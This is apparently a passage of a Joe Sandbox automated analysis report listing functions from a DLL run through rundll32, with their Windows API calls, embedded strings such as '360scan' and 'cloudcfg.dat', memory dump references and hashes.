Part of subcall function 0000000180064DE4: PathAppendW.SHLWAPI ref: 0000000180064E75
Part of subcall function 0000000180064DE4: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000180064E7E
Part of subcall function 0000000180064DE4: LeaveCriticalSection.KERNEL32 ref: 0000000180064EA8

Part of subcall function 00000001800647B0: EnterCriticalSection.KERNEL32 ref: 0000000180064800
Part of subcall function 00000001800647B0: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800648B2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AppendEnterFileModuleNamePathmemset$??2@CloseHandleLeaveOpenProcess_wcsicmp
String ID:
API String ID: 1628498879-0
Opcode ID: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
Instruction ID: 97b4a975282553c66a0ecb0666d5844a1919ec74819ec340ad2c10574fb99984
Opcode Fuzzy Hash: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
Instruction Fuzzy Hash: C531AF71708A8881FBA2DF15E8543D673A1BBCD7C8F808025AA4947A95EF3DC709CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064338 Relevance: 9.1, APIs: 6, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000180064372
GetFileSize.KERNEL32 ref: 0000000180064394
GetFileSize.KERNEL32 ref: 00000001800643A2
ReadFile.KERNEL32 ref: 00000001800643DE
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064406
CloseHandle.KERNEL32 ref: 000000018006440F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Size$CloseCreateHandleRead
String ID:
API String ID: 1601809017-0
Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000772C Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180007759
??_V@YAXPEAX@Z.MSVCRT ref: 000000018000776C
free.MSVCRT ref: 0000000180007787
free.MSVCRT ref: 000000018000779A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001800075A0), ref: 00000001800077E0
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001800075A0), ref: 00000001800077F4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSectionfree$EnterLeave
String ID:
API String ID: 2088343094-0
Opcode ID: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
Instruction ID: 6eb304321519da1f53f45f1cff4b3a54b1501cb2ad61fff334524383177ac9c5
Opcode Fuzzy Hash: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
Instruction Fuzzy Hash: 9021A932B05A4482EB45CF65E49039D73A0F79CFC8F158011EA5E4B666CF38C65A8310

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800015C4 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800015D5
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000001800015E3
GetLastError.KERNEL32 ref: 00000001800015ED
memset.MSVCRT ref: 000000018000162D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018000163B
GetLastError.KERNEL32 ref: 0000000180001645

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinmemset
String ID:
API String ID: 1980634866-0
Opcode ID: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
Instruction ID: 02bb1c2e578d024aba7b1d294f23a26f9da54a41464e923504772a2296b722cf
Opcode Fuzzy Hash: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
Instruction Fuzzy Hash: 8E119E3470160ED1F7DAEB259C553E522A1BF9C782F64C01AF52B850A0EE28C74DC720

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004CD44 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5
??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CE1A
??3@YAXPEAX@Z.MSVCRT ref: 000000018004D181

Strings

Catalog_Entries, xrefs: 000000018004CD48
Num_Catalog_Entries, xrefs: 000000018004CD4A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1245774677-781996053
Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004687C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 248COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180046A22
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180046A67

Strings

Catalog_Entries, xrefs: 0000000180046922
Num_Catalog_Entries, xrefs: 0000000180046924

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1936579350-781996053
Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D78C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 000000018001D878
GetFileAttributesW.KERNEL32 ref: 000000018001D8A3
GetFileAttributesW.KERNEL32 ref: 000000018001D968
PathFileExistsW.SHLWAPI ref: 000000018001D9B1

Strings

::{20D04FE0-3AEA-1069-A2D8-08002B30309D}, xrefs: 000000018001D7DE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Attributes$ExistsPath
String ID: ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
API String ID: 3549565335-3700740638
Opcode ID: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
Instruction ID: 308d89a456878f58a443b3b63cbf74fe77f883dd4a59461d8164aca204eacb87
Opcode Fuzzy Hash: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
Instruction Fuzzy Hash: 8A915072700A489AEB95DF69C8403DD3361FB49BE4F408316EB6997AD5EF74CA59C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800253C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0000000180025ABC
gfffffff, xrefs: 0000000180025519

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: \\?\$gfffffff
API String ID: 0-1566866656
Opcode ID: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
Instruction ID: bfc90c4694c0de5ac08ccb904688b68cff8c4fcbe65cd7113e56e150174f4709
Opcode Fuzzy Hash: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
Instruction Fuzzy Hash: 0C81C232700B488AEBA29B25E8403DE3360F789BE5F548315EEAA477D5DF78C649C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040418 Relevance: 8.9, APIs: 7, Instructions: 155sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Sleep
String ID:
API String ID: 950586405-0
Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32 ref: 0000000180010A0B
RegSetValueExW.ADVAPI32 ref: 0000000180010AF9
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010B02
RegCloseKey.ADVAPI32 ref: 0000000180010B0C

Strings

360scan, xrefs: 00000001800109E5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseCreateValue
String ID: 360scan
API String ID: 1818849710-2450673717
Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800671A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0000000180067297
malloc.MSVCRT ref: 00000001800672B9
?terminate@@YAXXZ.MSVCRT ref: 0000000180067307
_CxxThrowException.MSVCRT ref: 0000000180067323

Strings

csm, xrefs: 000000018006722B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ?terminate@@ExceptionThrow__crt_fast_encode_pointermalloc
String ID: csm
API String ID: 760693298-1018135373
Opcode ID: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
Instruction ID: 259617d04e03f410bbb53384dcf33072f4c9910d22c17cce453464633d750d07
Opcode Fuzzy Hash: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
Instruction Fuzzy Hash: CB41DD72310B4886DBA29F25E8807ADB3A2F748BC8F208016FB5D43B56CF38DA55C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96sleeplibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,000000018001AEC5), ref: 00000001800747AB
KiUserExceptionDispatcher.NTDLL ref: 00000001800747EF
Sleep.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074840
SetLastError.KERNEL32(?,?,?,000000018001AEC5), ref: 0000000180074885

Strings

InitOnceExecuteOnce, xrefs: 00000001800747A1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressDispatcherErrorExceptionLastProcSleepUser
String ID: InitOnceExecuteOnce
API String ID: 1145120385-4081768745
Opcode ID: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction ID: d97429db02a29b97f0d7b061f75759de830bcf77ba77d21ec7224c84f46128ac
Opcode Fuzzy Hash: 094ff7c6e7223ac0c25a3f196aef8d97d885558a79827bf00b4784aca917e5fd
Instruction Fuzzy Hash: 4331C63131175881FBDA8B65AC103A92294BB4DBE4F44C225FE6A9B7D4DF3DCA4A8300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008224 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008249
GetProcAddress.KERNEL32 ref: 0000000180008262
RegCreateKeyExW.ADVAPI32 ref: 00000001800082FB

Strings

RegCreateKeyTransactedW, xrefs: 0000000180008258
Advapi32.dll, xrefs: 0000000180008242

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1964897782-2994018265
Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E2D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000E31F
GetModuleFileNameW.KERNEL32 ref: 000000018000E341
PathAppendW.SHLWAPI ref: 000000018000E385

Strings

cloudcfg.dat, xrefs: 000000018000E379
..\Config\cloudcfg.dat, xrefs: 000000018000E350

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
API String ID: 1620117007-2349577946
Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32filewindowtimeCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 000000018005F32B
SendMessageTimeoutW.USER32 ref: 000000018005F35F
UnmapViewOfFile.KERNEL32 ref: 000000018005F383
CloseHandle.KERNEL32 ref: 000000018005F391

Strings

Q360SafeMonClass, xrefs: 000000018005F324

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseFileFindHandleMessageSendTimeoutUnmapViewWindow
String ID: Q360SafeMonClass
API String ID: 2549143951-79629921
Opcode ID: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
Instruction ID: c32431e1a2230fb89d0ac82bf3fb31adf9d80d138a3069ac5e7463625b7e75da
Opcode Fuzzy Hash: 5a6744058e53387468be0c2847b6ad283791736524b672027be404a340c54278
Instruction Fuzzy Hash: 7F012C36608B4883EB918F15F95479AB7A1F388BC4F454229EA4943B68DF3CD248CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074A30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180074A58
GetProcAddress.KERNEL32 ref: 0000000180074A6E
FreeLibrary.KERNEL32 ref: 0000000180074A87

Strings

CorExitProcess, xrefs: 0000000180074A67
mscoree.dll, xrefs: 0000000180074A4F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800572CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000001800572F3
GetProcAddress.KERNEL32 ref: 0000000180057303
GetTickCount.KERNEL32 ref: 0000000180057325

Strings

kernel32, xrefs: 00000001800572EC
GetTickCount64, xrefs: 00000001800572FC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: GetTickCount64$kernel32
API String ID: 1545651562-1084265160
Opcode ID: 8336a6a89fcabd28b5c12f94c81a1b388f74c639fd6d2d3507a86c15d1e42b2a
